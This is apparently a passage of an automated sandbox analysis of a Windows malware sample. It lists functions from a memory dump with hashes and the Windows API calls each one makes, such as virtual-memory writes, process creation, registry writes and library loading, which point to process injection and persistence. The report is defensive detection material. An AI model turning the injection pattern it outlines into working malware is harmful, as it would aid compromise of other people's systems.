                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: D5cI$Z[h]$h%U
                                • API String ID: 0-4128129217
                                • Opcode ID: f92879f2f2c320351cc56e06ad31e32b2135baccca355d7e3f07c86b399fb40e
                                • Instruction ID: 981cdd65699611d9af7c4c9d6d051e87af70543ad05946c0e51ee6a3acdce4e5
                                • Opcode Fuzzy Hash: f92879f2f2c320351cc56e06ad31e32b2135baccca355d7e3f07c86b399fb40e
                                • Instruction Fuzzy Hash: E85210726103899FDB758F78CD847CABBB2BF95350F55821ADC899B224C3709A81CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B5844, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 672COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: D5cI$Z[h]$h%U
                                • API String ID: 0-4128129217
                                • Opcode ID: 43db95b7f4491f411ae4dca739b58bb45f26f0e2d0631b632ea2e68af2ed60ad
                                • Instruction ID: bf1797c765639184d4be12a73a112ef0e0359868cfca0ba1aff74279079367b5
                                • Opcode Fuzzy Hash: 43db95b7f4491f411ae4dca739b58bb45f26f0e2d0631b632ea2e68af2ed60ad
                                • Instruction Fuzzy Hash: 2D52FF726103899FDB718F79CD847CABBB2BF95350F55821ADC899B224C3749A81CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B4352, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 640nativeCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 022B7402: LoadLibraryA.KERNELBASE(EBE34479), ref: 022B75F0
                                • NtWriteVirtualMemory.NTDLL(?,0688E733,?,00000000,?,?,?,?,-C2E0AB5C), ref: 022B4FAB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadMemoryVirtualWrite
                                • String ID: D5cI$Z[h]$h%U
                                • API String ID: 3569954152-4128129217
                                • Opcode ID: dede62516f2cb084a876dfb5edb4ffba13bdef29a06c598fb734577de4f13638
                                • Instruction ID: 705a7ae05a923bdb696eb1494237c16b656bd29c9752323f7ca122624cf203e6
                                • Opcode Fuzzy Hash: dede62516f2cb084a876dfb5edb4ffba13bdef29a06c598fb734577de4f13638
                                • Instruction Fuzzy Hash: DF52FEB26103899FDB758F79CD847CABBB2BF95350F45821ADC899B214C3749A81CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B0BC7, Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 769COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 022B5971: NtAllocateVirtualMemory.NTDLL ref: 022B5AC2
                                • TerminateProcess.KERNELBASE(CAF71672,-70DBCC6D), ref: 022B5486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryProcessTerminateVirtual
                                • String ID: Qp a$SBTI
                                • API String ID: 2292769835-1817519146
                                • Opcode ID: 9c3037d9b26bdb4a64bdd675c76e754861395c3df9f712bdc9d1507e879ea9b6
                                • Instruction ID: 923be688a05a0fd76b9b5c1e2093b8830df22b01115e4e6a55aa39c03b9680e8
                                • Opcode Fuzzy Hash: 9c3037d9b26bdb4a64bdd675c76e754861395c3df9f712bdc9d1507e879ea9b6
                                • Instruction Fuzzy Hash: E46231726143898FDB759F78CC987EE7BB2AF95380F55412DDC899B254C3308A82CB06
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B46C8, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 599nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtWriteVirtualMemory.NTDLL(?,0688E733,?,00000000,?,?,?,?,-C2E0AB5C), ref: 022B4FAB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: MemoryVirtualWrite
                                • String ID: D5cI$Z[h]
                                • API String ID: 3527976591-1924496853
                                • Opcode ID: 06f8dcfd16cbe7fbc5c01ac17a4841849c94b3483891891e062c189f5278e202
                                • Instruction ID: fbc490b6be6abd9e860f1603f9f948845d81d3ff7746a59b891bfa52a3661b47
                                • Opcode Fuzzy Hash: 06f8dcfd16cbe7fbc5c01ac17a4841849c94b3483891891e062c189f5278e202
                                • Instruction Fuzzy Hash: 133243716122898FDB718F68CC90BCA7BB6FF5A340F94821ADD488B71AD3709645CF81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B10E0, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 324COMMON
                                Download Yara Rule
                                APIs
                                • TerminateProcess.KERNELBASE(CAF71672,-70DBCC6D), ref: 022B5486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: ProcessTerminate
                                • String ID: SBTI$]
                                • API String ID: 560597551-2907362054
                                • Opcode ID: b510d029fc9f00d23fae9653be5194a0dea5f5a8e8eb8b99354ff11baf23f031
                                • Instruction ID: 132d9389e896207b8aafb92222cedd4e2965429b281dcdcdb88f93c6ff12907c
                                • Opcode Fuzzy Hash: b510d029fc9f00d23fae9653be5194a0dea5f5a8e8eb8b99354ff11baf23f031
                                • Instruction Fuzzy Hash: AFB1A93056A3829FDB354EA888A4BCB37A39F13344FE4421ECD098F74AD3769149CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B084F, Relevance: 4.1, Strings: 3, Instructions: 348COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <s$tB%c$^
                                • API String ID: 0-3899667951
                                • Opcode ID: 208e045334caf0e085858a9252d73601413be4c1697dd929f9ed5c2b77634579
                                • Instruction ID: 31c1bc0a9ab61be22eacb9334ca167736c0f0bd0aa5a09cadc8d90a364e3217c
                                • Opcode Fuzzy Hash: 208e045334caf0e085858a9252d73601413be4c1697dd929f9ed5c2b77634579
                                • Instruction Fuzzy Hash: 74A108709AB1429FE7225E8C8881FCB279B9F67384BF4521ADA055F70FE2B25205C7D0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B0CAC, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 022B7402: LoadLibraryA.KERNELBASE(EBE34479), ref: 022B75F0
                                • TerminateProcess.KERNELBASE(CAF71672,-70DBCC6D), ref: 022B5486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadProcessTerminate
                                • String ID: SBTI
                                • API String ID: 3349790660-1513441178
                                • Opcode ID: 746f6a1952cab439fbcf0b1d298dddff19dce977b6c352c0acad4898da294cbf
                                • Instruction ID: 2e5eef4c9cf82e7c62ee2c2ba9427708e6f081b0677df454eb17cc9b3a6f5826
                                • Opcode Fuzzy Hash: 746f6a1952cab439fbcf0b1d298dddff19dce977b6c352c0acad4898da294cbf
                                • Instruction Fuzzy Hash: 6812A7706193868FDB369FA88894BDF3BA3AF56340FA4412ECC498F34AD3365645CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B8030, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 271COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: &bX
                                • API String ID: 1029625771-1885336810
                                • Opcode ID: 85fa75ccfb4b9bb3e2d31ced8547a88da9825e2370356f247e7d4f3e00829e4a
                                • Instruction ID: 7aba5efaa2522ca021ed544b77b34b9390c5b1854add30f8e3bda0f214156cbc
                                • Opcode Fuzzy Hash: 85fa75ccfb4b9bb3e2d31ced8547a88da9825e2370356f247e7d4f3e00829e4a
                                • Instruction Fuzzy Hash: 18B1DC75A143899FDB36DFA8C8907DA77B2EF48380F94412ADC4D9B208D7709A81CB56
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B4B96, Relevance: 1.9, APIs: 1, Instructions: 398COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e6f001ef024defe129fecb8361ef7ba875e1dbece44e7e22a94088bb1b397083
                                • Instruction ID: fa38444aec40f56ed790d9f21c876e98b4252d359602438ecea66a23e0af0ea1
                                • Opcode Fuzzy Hash: e6f001ef024defe129fecb8361ef7ba875e1dbece44e7e22a94088bb1b397083
                                • Instruction Fuzzy Hash: 93E197755162858FDB329FA8CCD0BCA37A7EF2A344FA44219DE498F30AD3B15645CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B4CD0, Relevance: 1.7, APIs: 1, Instructions: 236nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtWriteVirtualMemory.NTDLL(?,0688E733,?,00000000,?,?,?,?,-C2E0AB5C), ref: 022B4FAB
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: MemoryVirtualWrite
                                • String ID:
                                • API String ID: 3527976591-0
                                • Opcode ID: 1960062e0ac4caf3cb0d98d6f6a26f695fee2000fde89175e4499b6e2707a77b
                                • Instruction ID: 269ccbd3040072c669f0d07c6e986a8b784ed3312e90c932e1cb839272c9fe94
                                • Opcode Fuzzy Hash: 1960062e0ac4caf3cb0d98d6f6a26f695fee2000fde89175e4499b6e2707a77b
                                • Instruction Fuzzy Hash: CBA1FDB26102898FDF718F68CD947CE3BA6BF58350F45822ADD4D9B254C3B19A81CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B0571, Relevance: 1.7, APIs: 1, Instructions: 174COMMON
                                Download Yara Rule
                                APIs
                                • EnumWindows.USER32(022B0626,?,00000000,2A2A731E,022B43D7,-9EB57EE9,55250968,B2079360,?,-26B1491D), ref: 022B05A4
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: EnumWindows
                                • String ID:
                                • API String ID: 1129996299-0
                                • Opcode ID: 2acc720ea262761585cda47176119590f05b4b3d9d1939a6db99a79baba275a8
                                • Instruction ID: dcae9cbec0578273bddccfabbcf70a3d21ebeb1262bf6c6774bf4ef37c26a5bc
                                • Opcode Fuzzy Hash: 2acc720ea262761585cda47176119590f05b4b3d9d1939a6db99a79baba275a8
                                • Instruction Fuzzy Hash: 68611E729043499FCB659F7488547EABBF2EF89350F56452DDC898B214D3309A82CF86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B9189, Relevance: 1.6, APIs: 1, Instructions: 142nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtProtectVirtualMemory.NTDLL(-00000001815BAAEC,?,?,?,?,022B889B), ref: 022B9285
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: MemoryProtectVirtual
                                • String ID:
                                • API String ID: 2706961497-0
                                • Opcode ID: 942bebcc9efab07c46b194216275c5a7fd76e5c4c22a93985b2182b0fcfdeb5f
                                • Instruction ID: 8a3ad1c1d8cf1dd5e9b083c6c13f55a396a38597e1aca950db57a54c1d7a8c92
                                • Opcode Fuzzy Hash: 942bebcc9efab07c46b194216275c5a7fd76e5c4c22a93985b2182b0fcfdeb5f
                                • Instruction Fuzzy Hash: 1D31E0749BF0825FA2160E8C8C95EC7174B89273487F4665EDB014FB4FF2A6214AE7E4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B5971, Relevance: 1.6, APIs: 1, Instructions: 102memorynativeCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 022B7402: LoadLibraryA.KERNELBASE(EBE34479), ref: 022B75F0
                                • NtAllocateVirtualMemory.NTDLL ref: 022B5AC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateLibraryLoadMemoryVirtual
                                • String ID:
                                • API String ID: 2616484454-0
                                • Opcode ID: 9a34077ba48acb3fd026c6e2647e8f5572c006ca468281b0462f393782833d75
                                • Instruction ID: 40e7cd630b640df767e5ef9c7106dcfb31c93a6d50074222bba0a488001cd673
                                • Opcode Fuzzy Hash: 9a34077ba48acb3fd026c6e2647e8f5572c006ca468281b0462f393782833d75
                                • Instruction Fuzzy Hash: EA41C9B25183888FCB709E64DC557EABBA2EF85350F45011EEC8AAB250D3359A81CB05
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B9122, Relevance: 1.5, APIs: 1, Instructions: 35nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtProtectVirtualMemory.NTDLL(-00000001815BAAEC,?,?,?,?,022B889B), ref: 022B9285
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: MemoryProtectVirtual
                                • String ID:
                                • API String ID: 2706961497-0
                                • Opcode ID: f67dc9dd86288c91c78c32721ddca358dae4bbe1d5817157d87730b959a511bb
                                • Instruction ID: a5351140e8fc36404d86d13c36bbc12ea8129f5487ccf94e5e14834d0a86e5ae
                                • Opcode Fuzzy Hash: f67dc9dd86288c91c78c32721ddca358dae4bbe1d5817157d87730b959a511bb
                                • Instruction Fuzzy Hash: F50131756142888FDB35CE18CC546DE77AAEFD9300F45812EAC0D9B304C7705E05CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B6694, Relevance: 1.5, APIs: 1, Instructions: 23libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: e29770ca123212040cf81b24ca598ada135daf2f44708c09d13b9f0cb4737e7c
                                • Instruction ID: 0e2ca83c924790c01a7f5c85b37443469f2d2df7701b30a7cdbbc3aaec61ddc2
                                • Opcode Fuzzy Hash: e29770ca123212040cf81b24ca598ada135daf2f44708c09d13b9f0cb4737e7c
                                • Instruction Fuzzy Hash: 2DD02E366D130C0EC222719848192DE27140BA838079CC126C0451B30CDD52838A67E2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B245A, Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateLongMemoryNamePathVirtual
                                • String ID: ^M0
                                • API String ID: 4035640882-1678713791
                                • Opcode ID: 8bb45132e60c76d8bd7eaa7c509c36775e56b168f5cd1483317d6b59a38eea7b
                                • Instruction ID: d85d3b75a857272bc0218297adec6088868c07f4823c2cf8209d3084b22659d7
                                • Opcode Fuzzy Hash: 8bb45132e60c76d8bd7eaa7c509c36775e56b168f5cd1483317d6b59a38eea7b
                                • Instruction Fuzzy Hash: C6911472A143488FDB759FB8CC947DA77A6BF89390F954119DC989B204D3308A868F52
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B5DAE, Relevance: .4, Instructions: 351COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryVirtual
                                • String ID:
                                • API String ID: 2167126740-0
                                • Opcode ID: 64cc3c7974b60d1284e8bd7646c8f4fa2cd87dc66514612cd7a97aefafbe1f6e
                                • Instruction ID: 43359e00f1d84338aa39859452e409e36ff506b31fdb1e7a5a2fa4f125c22b47
                                • Opcode Fuzzy Hash: 64cc3c7974b60d1284e8bd7646c8f4fa2cd87dc66514612cd7a97aefafbe1f6e
                                • Instruction Fuzzy Hash: 7CE11F7191438A8FDB759FB4CC557EE7BA2AF45380F42852EDC8A9B214D3308A81CF52
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B3C9E, Relevance: .2, Instructions: 199COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 933e09a0e566040ed55a149e7b0071b951d11ebcc97617f75c0cfef1cc5664e1
                                • Instruction ID: d413603f0be5fafbd1af04ee3e7919f638b6e8a13a3d836c788a525fa6b16c53
                                • Opcode Fuzzy Hash: 933e09a0e566040ed55a149e7b0071b951d11ebcc97617f75c0cfef1cc5664e1
                                • Instruction Fuzzy Hash: 31714A715043858FDB76DFB4C8947EABBE1AF46350F45816DCCC99B24AE3348A82CB46
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B8687, Relevance: .2, Instructions: 186COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 600b7f071284f612d06c1b6bb92818eefebe88fbd084252c7ad6678134207537
                                • Instruction ID: 231fc10f87ae17246cebc7f5753e678fece122cdbe3514992529c3d8b58e56d9
                                • Opcode Fuzzy Hash: 600b7f071284f612d06c1b6bb92818eefebe88fbd084252c7ad6678134207537
                                • Instruction Fuzzy Hash: 736121716043489FDB65DF78C9957EABBA2EF85340F95412EDC899B204D3309A82CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B5BF3, Relevance: .2, Instructions: 181COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateLibraryLoadMemoryVirtual
                                • String ID:
                                • API String ID: 2616484454-0
                                • Opcode ID: d8d18de3db3974c54673e61e89120c1c992a7910115773537a5ea906f950fbbb
                                • Instruction ID: d000a02fd18da522b43869145126b524d438bad93c9647a863206e2ecefbadb1
                                • Opcode Fuzzy Hash: d8d18de3db3974c54673e61e89120c1c992a7910115773537a5ea906f950fbbb
                                • Instruction Fuzzy Hash: 6261F3715143488FDB669FB488553EEBBB2EF85390F95412EDC899B204D7308A82CF56
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B9A4B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessInternalW.KERNELBASE ref: 022B9A0E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: CreateInternalProcess
                                • String ID: <$\
                                • API String ID: 2186235152-4038975477
                                • Opcode ID: 3722dd142f99d7d982afd0904b3e771c167618320687508889f76436977cab96
                                • Instruction ID: c2fa775c4eb6b038d8bec98f2cadfafe673004a248d6c62e7f72976183142ed7
                                • Opcode Fuzzy Hash: 3722dd142f99d7d982afd0904b3e771c167618320687508889f76436977cab96
                                • Instruction Fuzzy Hash: 5851D83059B1868AE7361E984891BCB1B179F27348FF89259CB044F74FF27A524ACBD4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401144, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.335499477.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.335486041.0000000000400000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.335513902.0000000000415000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.335518943.0000000000417000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: #100
                                • String ID: VB5!6&*
                                • API String ID: 1341478452-3593831657
                                • Opcode ID: 42e5da2b8ea787eb35509ad5e65856a32169b05f1711deb830332ea8f6e0291f
                                • Instruction ID: 753f51a2eaeaf820ac68413a20b2ccc286010b2bbf1855bbf3e3370ecb8a4347
                                • Opcode Fuzzy Hash: 42e5da2b8ea787eb35509ad5e65856a32169b05f1711deb830332ea8f6e0291f
                                • Instruction Fuzzy Hash: 835195A108E7D16FC30747B49C656A23FB8AE5326874B45EBD4C2DF4B3D2580C4AC7A2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B57CB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121libraryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: N^~I
                                • API String ID: 2994545307-2182176484
                                • Opcode ID: 96af1cf3c83a8df44c6300cde45a169c0fed5ca4a00481bd8281fc678d1e52dd
                                • Instruction ID: 3f7a64e42e0abbc1acd68160bb1d1bd60a7c5ac238dafff067c688c96db941d0
                                • Opcode Fuzzy Hash: 96af1cf3c83a8df44c6300cde45a169c0fed5ca4a00481bd8281fc678d1e52dd
                                • Instruction Fuzzy Hash: 8631FE725246529FCF236FF088942F47FB5FF5239078452A9C4918F09AD362C44ACBD2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B74AC, Relevance: 1.7, APIs: 1, Instructions: 181libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNELBASE(EBE34479), ref: 022B75F0
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 157ccad32035c75b6f6b5894dc78f226c6e06489a869651ca8da9f7fa4e9b5fd
                                • Instruction ID: bda864ffa6fc1585eb9f4ef40d2ecb4e06e50e3210e98b95c96e2b0dad87bacd
                                • Opcode Fuzzy Hash: 157ccad32035c75b6f6b5894dc78f226c6e06489a869651ca8da9f7fa4e9b5fd
                                • Instruction Fuzzy Hash: 5351187196B1828FD3111EDC4490FCB5B6B8A273497F4165AEB018F74FF2A16109C7D4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B2288, Relevance: 1.7, APIs: 1, Instructions: 177registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegSetValueExA.KERNELBASE(?,0000005B,-000000019C2138EA,1291EF98,?,?,022B6F45,?,?), ref: 022B23BB
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: Value
                                • String ID:
                                • API String ID: 3702945584-0
                                • Opcode ID: a572f696a2ea7d8deb13e7a40c55bcc05d32c04845cbdeb00008e0e55ca705c7
                                • Instruction ID: 5a3d3968aa8efbeebc0f3ddb04a3c9a8ec0bfe56402b993c0377acf4dbb65ece
                                • Opcode Fuzzy Hash: a572f696a2ea7d8deb13e7a40c55bcc05d32c04845cbdeb00008e0e55ca705c7
                                • Instruction Fuzzy Hash: 2541B0749AB282CFD3120ECC4891BC72B5B9A2B7447F8565ADE018F74FF1A6610AD3D4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B54A6, Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                Download Yara Rule
                                APIs
                                • TerminateProcess.KERNELBASE(CAF71672,-70DBCC6D), ref: 022B5486
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: ProcessTerminate
                                • String ID:
                                • API String ID: 560597551-0
                                • Opcode ID: fa3110943fe91abf0975cdd508ffd7a7af17543fe26e977870b6c3c48bcfcda5
                                • Instruction ID: bf5b1b4bb264f4e17bc293238c29c254fbd358015642d8ac596c8f8284fffb65
                                • Opcode Fuzzy Hash: fa3110943fe91abf0975cdd508ffd7a7af17543fe26e977870b6c3c48bcfcda5
                                • Instruction Fuzzy Hash: C931AEB49AB0829F72251E8C4881FC7075B883774A3F46699DB014FB4FF2D6A119D3D4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B7402, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNELBASE(EBE34479), ref: 022B75F0
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 16dc437dc90624004ba26c45a60b3070ce733f7f7e08b1c5b65cf2065ae94afa
                                • Instruction ID: abed1c340c17a897de0a8aac364097f2325521b4ef02aa600a2d1727df24aab8
                                • Opcode Fuzzy Hash: 16dc437dc90624004ba26c45a60b3070ce733f7f7e08b1c5b65cf2065ae94afa
                                • Instruction Fuzzy Hash: C32136716103889FDF35EFA8C994BDD76A1BF88384F90402AEC1ADB208EB304B518F15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B5683, Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNELBASE(?,-6D7F335A), ref: 022B5769
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 315c2d6b9815f7a731ed1d285190b6b8d31567fddc5f7419074b03be3d7bf40b
                                • Instruction ID: 7ada5d8804ead293dff380cedc151420d189aeef98b76e4281f97a0ee9c4eccc
                                • Opcode Fuzzy Hash: 315c2d6b9815f7a731ed1d285190b6b8d31567fddc5f7419074b03be3d7bf40b
                                • Instruction Fuzzy Hash: 4411BE769883468FCB209E3489197EEBBA6EF92760F57051DDCD17B250C3701A86DB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B2219, Relevance: 1.6, APIs: 1, Instructions: 50registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 022B5971: NtAllocateVirtualMemory.NTDLL ref: 022B5AC2
                                • RegSetValueExA.KERNELBASE(?,0000005B,-000000019C2138EA,1291EF98,?,?,022B6F45,?,?), ref: 022B23BB
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryValueVirtual
                                • String ID:
                                • API String ID: 115516962-0
                                • Opcode ID: e3f5d489312683e0cc68b9f9a996f00e3cbf436e717e54005f59a8fa86e2063f
                                • Instruction ID: 23882e0cd02216149f3922b4b9cce720cf2eea9ebad84deb1d0c4f75f47c94a8
                                • Opcode Fuzzy Hash: e3f5d489312683e0cc68b9f9a996f00e3cbf436e717e54005f59a8fa86e2063f
                                • Instruction Fuzzy Hash: 9311E1B2914B899BCB308F1ACCC87CBB7A9FF99310F54411A9E4D9B209D3325E008B84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B7148, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                • GetLongPathNameW.KERNELBASE(?,?), ref: 022B719E
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID:
                                • API String ID: 82841172-0
                                • Opcode ID: bc9d113d87ca7a398fe69f1ab1d876cb3d9815107bd59f1051a7c30ef1e44ab1
                                • Instruction ID: 0f93562239c25b23556f8887c979f379b7b95ccddb30ecfb4bd5a55a4a87953d
                                • Opcode Fuzzy Hash: bc9d113d87ca7a398fe69f1ab1d876cb3d9815107bd59f1051a7c30ef1e44ab1
                                • Instruction Fuzzy Hash: 0FF0A93A5883869FCB249F20C8556EEB7B1FFA8390F4A142DECC94B310DB305A40CB16
                                Uniqueness

                                Uniqueness Score: -1.00%

